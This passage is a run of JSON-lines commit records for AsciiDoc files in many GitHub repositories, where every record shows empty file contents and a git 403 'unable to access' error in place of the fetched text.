/machinekit,strahlex\/machinekit,mhaberler\/machinekit,bobvanderlinden\/machinekit,Cid427\/machinekit,bobvanderlinden\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,Cid427\/machinekit,mhaberler\/machinekit,ArcEye\/machinekit-testing,mhaberler\/machinekit,ArcEye\/machinekit-testing,unseenlaser\/machinekit,kinsamanka\/machinekit,mhaberler\/machinekit,RunningLight\/machinekit","old_file":"src\/hal\/icomp-example\/instcomp.asciidoc","new_file":"src\/hal\/icomp-example\/instcomp.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bobvanderlinden\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a2291c62dae77a6d351576f343712ab16b8a9b95","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 
2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d50ce2a1d62652cbf2c4e541faf73cd73ec4745","subject":"Python note: Some Pip notes","message":"Python note: Some Pip notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"341be73f47010c54884e8f88aca8321fd97ae112","subject":"More polish","message":"More polish\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,DongsunPark\/bookmarks,razordaze\/tut-bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8c4f679963b129e8712b9a47703cb8057029f4d","subject":"Update README","message":"Update README\n\n- Remove section about the Maven properties. There is (and will only\n ever be) only 1 target at a time, no need for users to configure it.\n- Add Travis and Coverity badges. 
It looks cool.\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bef42ef32b1c4aa01b2eb64d8f503f84fe8c5914","subject":"Readme: Add section Run with Waitress","message":"Readme: Add section Run with Waitress\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707bd33d5f24c7b51819f2265b15bd12193c4d0f","subject":"Create README.adoc","message":"Create README.adoc","repos":"PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PureSolTechnologies\/DuctileDB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2cf5cc3fd1075e4fd611732531319ef1a6b7762","subject":"Typos correction in README.adoc","message":"Typos correction in README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfb67d36a136f7474f04ce99e1a04c8014b816f1","subject":"Update 2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","message":"Update 2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","repos":"mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io","old_file":"_posts\/2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","new_file":"_posts\/2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mnishihan\/mnishihan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa2fd6b94fa68ce1689ed9a7cc0e406b44abd90","subject":"y2b create post Glacier White PS4 Unboxing (Destiny Bundle)","message":"y2b create post Glacier White PS4 Unboxing (Destiny Bundle)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-11-Glacier-White-PS4-Unboxing-Destiny-Bundle.adoc","new_file":"_posts\/2014-09-11-Glacier-White-PS4-Unboxing-Destiny-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a12ccd73ce3b4793907d3197f8ee0232dae266ab","subject":"Create 
domain-operations.asciidoc","message":"Create domain-operations.asciidoc","repos":"janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire","old_file":"doc\/domain-operations.asciidoc","new_file":"doc\/domain-operations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janScheible\/rising-empire.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"896e6de633a9f8e514058d1113f9367e06486e43","subject":"Update 2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","message":"Update 2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","repos":"padurean\/padurean.github.io,padurean\/padurean.github.io","old_file":"_posts\/2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","new_file":"_posts\/2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/padurean\/padurean.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f9b565e70dd3f1c649d279d215c3076e2dd546c","subject":"Update 2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","message":"Update 2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","new_file":"_posts\/2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"150dc34d465f5994e68185d29d94db53f121c1e8","subject":"y2b create post Epson Artisan 837 - A cool multifunction printer?","message":"y2b create post Epson Artisan 837 - A cool multifunction printer?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-10-Epson-Artisan-837--A-cool-multifunction-printer.adoc","new_file":"_posts\/2012-03-10-Epson-Artisan-837--A-cool-multifunction-printer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c200c43a007e97314fdffbbe6b89a290152cfd24","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97373300aff554549be6e0dc77f806abdb40a719","subject":"Update 2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","message":"Update 
2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","new_file":"_posts\/2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1770ed9320499d47e363920bd40c12b085610333","subject":"y2b create post Apple iPhone 4S: Keynote Review","message":"y2b create post Apple iPhone 4S: Keynote Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-04-Apple-iPhone-4S-Keynote-Review.adoc","new_file":"_posts\/2011-10-04-Apple-iPhone-4S-Keynote-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bb2c28287da97e7825f2ae5837b2e2f4fe5c259","subject":"Update 2015-11-21-Application-Startup-Time.adoc","message":"Update 2015-11-21-Application-Startup-Time.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-11-21-Application-Startup-Time.adoc","new_file":"_posts\/2015-11-21-Application-Startup-Time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"133966171e83f91f70f810b07b31c7717e1b01df","subject":"Update 2016-12-08-Dealing-with-merge-chaos.adoc","message":"Update 2016-12-08-Dealing-with-merge-chaos.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-12-08-Dealing-with-merge-chaos.adoc","new_file":"_posts\/2016-12-08-Dealing-with-merge-chaos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73b9608c30475a8bdb858ebf07805b3006d4780c","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff57fd208b4591d2998c80b6b9bac95c9934193","subject":"Update 2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","message":"Update 
2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","new_file":"_posts\/2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b028fb0c523bf261eca3c33794e68b52adfcd42c","subject":"Update 2017-05-20-How-to-clean-a-docker-registry-v2.adoc","message":"Update 2017-05-20-How-to-clean-a-docker-registry-v2.adoc","repos":"gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english","old_file":"_posts\/2017-05-20-How-to-clean-a-docker-registry-v2.adoc","new_file":"_posts\/2017-05-20-How-to-clean-a-docker-registry-v2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gbougeard\/blog.english.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ee6759e4cc96acb230113d9991c4d0218c8e78b","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2172e274f538e331a87461b1349b26f9a871949e","subject":"Added setOutHeader EIP docs","message":"Added setOutHeader EIP 
docs\n","repos":"apache\/camel,tdiesler\/camel,zregvart\/camel,onders86\/camel,jonmcewen\/camel,gautric\/camel,alvinkwekel\/camel,tadayosi\/camel,curso007\/camel,jonmcewen\/camel,christophd\/camel,tdiesler\/camel,cunningt\/camel,dmvolod\/camel,alvinkwekel\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,DariusX\/camel,CodeSmell\/camel,cunningt\/camel,akhettar\/camel,Fabryprog\/camel,ullgren\/camel,tadayosi\/camel,objectiser\/camel,davidkarlsen\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,snurmine\/camel,zregvart\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,gnodet\/camel,tdiesler\/camel,kevinearls\/camel,curso007\/camel,jamesnetherton\/camel,tadayosi\/camel,gautric\/camel,nikhilvibhav\/camel,mcollovati\/camel,ullgren\/camel,objectiser\/camel,ullgren\/camel,anoordover\/camel,dmvolod\/camel,Fabryprog\/camel,adessaigne\/camel,akhettar\/camel,davidkarlsen\/camel,DariusX\/camel,adessaigne\/camel,pmoerenhout\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,snurmine\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,sverkera\/camel,CodeSmell\/camel,Fabryprog\/camel,kevinearls\/camel,akhettar\/camel,ullgren\/camel,pax95\/camel,onders86\/camel,apache\/camel,pax95\/camel,gautric\/camel,gautric\/camel,jamesnetherton\/camel,nicolaferraro\/camel,dmvolod\/camel,pax95\/camel,christophd\/camel,curso007\/camel,cunningt\/camel,gnodet\/camel,akhettar\/camel,DariusX\/camel,jonmcewen\/camel,pmoerenhout\/camel,davidkarlsen\/camel,snurmine\/camel,pax95\/camel,alvinkwekel\/camel,pmoerenhout\/camel,sverkera\/camel,jamesnetherton\/camel,christophd\/camel,snurmine\/camel,pax95\/camel,jamesnetherton\/camel,apache\/camel,mcollovati\/camel,snurmine\/camel,objectiser\/camel,gnodet\/camel,mcollovati\/camel,akhettar\/camel,sverkera\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,onders86\/camel,nikhilvibhav\/camel,objectiser\/camel,sverkera\/camel,curso007\/camel,gautric\/camel,anoordover\/camel,snurmine\/camel,dmvolod\/camel,onders86\/camel,kevinearls\/camel,apache\/camel,pmoerenhout\/camel,anoordover\/camel,apache\/camel,curso007\/camel,jonmcewen\/camel,kevinearls\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,dmvolod\/camel,jamesnetherton\/camel,tadayosi\/camel,onders86\/camel,DariusX\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,gautric\/camel,kevinearls\/camel,Fabryprog\/camel,zregvart\/camel,anoordover\/camel,dmvolod\/camel,punkhorn\/camel-upstream,sverkera\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,adessaigne\/camel,jonmcewen\/camel,nikhilvibhav\/camel,cunningt\/camel,curso007\/camel,mcollovati\/camel,zregvart\/camel,gnodet\/camel,adessaigne\/camel,nicolaferraro\/camel,onders86\/camel,sverkera\/camel,tdiesler\/camel,anoordover\/camel,christophd\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setOutHeader-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setOutHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76bd9e6fa9a606eda9979b17e2b50316be4be7a0","subject":"Update 2015-08-19-Challenger-Analysing-the-File-Format.adoc","message":"Update 
2015-08-19-Challenger-Analysing-the-File-Format.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-19-Challenger-Analysing-the-File-Format.adoc","new_file":"_posts\/2015-08-19-Challenger-Analysing-the-File-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reversergeek\/reversergeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65496939c9e60ed6721b609e90e7eb970a8d42ed","subject":"y2b create post Is This The Best Headphone Deal Ever?","message":"y2b create post Is This The Best Headphone Deal Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-30-Is-This-The-Best-Headphone-Deal-Ever.adoc","new_file":"_posts\/2016-12-30-Is-This-The-Best-Headphone-Deal-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0c701bfc6c35a264ed03273bafde5db07779de1","subject":"2016-07-07-Anecdotes.adoc","message":"2016-07-07-Anecdotes.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-07-Anecdotes.adoc","new_file":"_posts\/2016-07-07-Anecdotes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7938709592c004e0116f8222303fba12c481e3f1","subject":"Documentation: add Groovy Ant Task","message":"Documentation: add Groovy Ant 
Task\n","repos":"tkruse\/incubator-groovy,paulk-asert\/groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,paplorinc\/incubator-groovy,antoaravinth\/incubator-groovy,bsideup\/incubator-groovy,christoph-frick\/groovy-core,groovy\/groovy-core,bsideup\/groovy-core,jwagenleitner\/groovy,kenzanmedia\/incubator-groovy,bsideup\/incubator-groovy,pickypg\/incubator-groovy,armsargis\/groovy,PascalSchumacher\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/incubator-groovy,apache\/groovy,groovy\/groovy-core,samanalysis\/incubator-groovy,groovy\/groovy-core,dpolivaev\/groovy,taoguan\/incubator-groovy,alien11689\/groovy-core,avafanasiev\/groovy,aaronzirbes\/incubator-groovy,bsideup\/groovy-core,armsargis\/groovy,sagarsane\/incubator-groovy,eginez\/incubator-groovy,ebourg\/groovy-core,taoguan\/incubator-groovy,avafanasiev\/groovy,rabbitcount\/incubator-groovy,christoph-frick\/groovy-core,gillius\/incubator-groovy,pickypg\/incubator-groovy,russel\/incubator-groovy,sagarsane\/incubator-groovy,fpavageau\/groovy,christoph-frick\/groovy-core,bsideup\/incubator-groovy,groovy\/groovy-core,aim-for-better\/incubator-groovy,samanalysis\/incubator-groovy,kenzanmedia\/incubator-groovy,dpolivaev\/groovy,traneHead\/groovy-core,bsideup\/groovy-core,alien11689\/incubator-groovy,sagarsane\/incubator-groovy,shils\/incubator-groovy,alien11689\/groovy-core,shils\/incubator-groovy,adjohnson916\/groovy-core,pickypg\/incubator-groovy,PascalSchumacher\/incubator-groovy,ebourg\/groovy-core,tkruse\/incubator-groovy,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,rabbitcount\/incubator-groovy,rabbitcount\/incubator-groovy,bsideup\/incubator-groovy,alien11689\/incubator-groovy,ebourg\/incubator-groovy,sagarsane\/incubator-groovy,gillius\/incubator-groovy,shils\/groovy,alien11689\/groovy-core,russel\/groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,PascalSchumacher\/incubator-groovy,apache\/incubator-groovy,aaronzirbes\/incubator-groovy,nobeans\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,jwagenleitner\/incubator-groovy,eginez\/incubator-groovy,i55ac\/incubator-groovy,guangying945\/incubator-groovy,graemerocher\/incubator-groovy,guangying945\/incubator-groovy,apache\/incubator-groovy,eginez\/incubator-groovy,gillius\/incubator-groovy,ChanJLee\/incubator-groovy,EPadronU\/incubator-groovy,aaronzirbes\/incubator-groovy,mariogarcia\/groovy-core,bsideup\/groovy-core,pledbrook\/incubator-groovy,nkhuyu\/incubator-groovy,nobeans\/incubator-groovy,kidaa\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,nobeans\/incubator-groovy,mariogarcia\/groovy-core,alien11689\/groovy-core,alien11689\/groovy-core,rlovtangen\/groovy-core,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,upadhyayap\/incubator-groovy,EPadronU\/incubator-groovy,groovy\/groovy-core,pledbrook\/incubator-groovy,upadhyayap\/incubator-groovy,kidaa\/incubator-groovy,shils\/groovy,tkruse\/incubator-groovy,apache\/groovy,EPadronU\/incubator-groovy,jwagenleitner\/incubator-groovy,antoaravinth\/incubator-groovy,shils\/incubator-groovy,fpavageau\/groovy,graemerocher\/incubator-groovy,adjohnson916\/groovy-core,avafanasiev\/groovy,rlovtangen\/groovy-core,kidaa\/incubator-groovy,nobeans\/incubator-groovy,apache\/incubator-groovy,gillius\/incubator-groovy,russel\/incubator-groovy,graemerocher\/incubator-groovy,adjohnson916\/incubator-groovy,guangying945\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,rlovtangen\/groovy-core,traneHead\/groovy-core,alien11689\/incubator-groovy,graemerocher\/incubator-groov
y,i55ac\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,pledbrook\/incubator-groovy,shils\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/incubator-groovy,fpavageau\/groovy,yukangguo\/incubator-groovy,nkhuyu\/incubator-groovy,kenzanmedia\/incubator-groovy,yukangguo\/incubator-groovy,fpavageau\/groovy,shils\/groovy,adjohnson916\/incubator-groovy,adjohnson916\/incubator-groovy,avafanasiev\/groovy,apache\/groovy,paplorinc\/incubator-groovy,i55ac\/incubator-groovy,upadhyayap\/incubator-groovy,christoph-frick\/groovy-core,paplorinc\/incubator-groovy,ebourg\/groovy-core,antoaravinth\/incubator-groovy,jwagenleitner\/groovy,adjohnson916\/incubator-groovy,sagarsane\/groovy-core,aim-for-better\/incubator-groovy,aim-for-better\/incubator-groovy,EPadronU\/incubator-groovy,ebourg\/incubator-groovy,yukangguo\/incubator-groovy,traneHead\/groovy-core,paulk-asert\/groovy,paulk-asert\/incubator-groovy,rlovtangen\/groovy-core,PascalSchumacher\/incubator-groovy,ChanJLee\/incubator-groovy,ebourg\/incubator-groovy,genqiang\/incubator-groovy,russel\/incubator-groovy,upadhyayap\/incubator-groovy,apache\/groovy,taoguan\/incubator-groovy,kidaa\/incubator-groovy,russel\/groovy,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,kenzanmedia\/incubator-groovy,mariogarcia\/groovy-core,russel\/incubator-groovy,i55ac\/incubator-groovy,dpolivaev\/groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,genqiang\/incubator-groovy,mariogarcia\/groovy-core,antoaravinth\/incubator-groovy,jwagenleitner\/groovy,samanalysis\/incubator-groovy,yukangguo\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/incubator-groovy,nkhuyu\/incubator-groovy,rabbitcount\/incubator-groovy,apache\/incubator-groovy,ChanJLee\/incubator-groovy,nkhuyu\/incubator-groovy,rlovtangen\/groovy-core,genqiang\/incubator-groovy,ebourg\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/groovy,russel\/groovy,guangying945\/incubator-groovy,mariogarcia\/groovy-core,pickypg\/incubator-groovy,taoguan\/incubator-groovy,samanalysis\/incubator-groovy,sagarsane\/groovy-core,adjohnson916\/groovy-core,armsargis\/groovy,aim-for-better\/incubator-groovy,shils\/groovy","old_file":"subprojects\/groovy-ant\/src\/spec\/doc\/groovy-ant-task.adoc","new_file":"subprojects\/groovy-ant\/src\/spec\/doc\/groovy-ant-task.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57f2b744a0caf440f2d58090029846cb12ac1502","subject":"Add RealmImport CR docs (#11037)","message":"Add RealmImport CR docs 
(#11037)\n\n","repos":"abstractj\/keycloak,ahus1\/keycloak,raehalme\/keycloak,stianst\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,abstractj\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,keycloak\/keycloak,keycloak\/keycloak,reneploetz\/keycloak,srose\/keycloak,reneploetz\/keycloak,stianst\/keycloak,ahus1\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,srose\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,srose\/keycloak,keycloak\/keycloak,srose\/keycloak,ahus1\/keycloak,srose\/keycloak,ahus1\/keycloak,stianst\/keycloak,stianst\/keycloak,jpkrohling\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/realm-import.adoc","new_file":"docs\/guides\/src\/main\/operator\/realm-import.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2341af88dd5eca8edf0f318d09105a9c54ce7da","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b853109ea3356a7aa39495957fd4afd7afa87d1","subject":"Update 2016-12-21-Non-stop.adoc","message":"Update 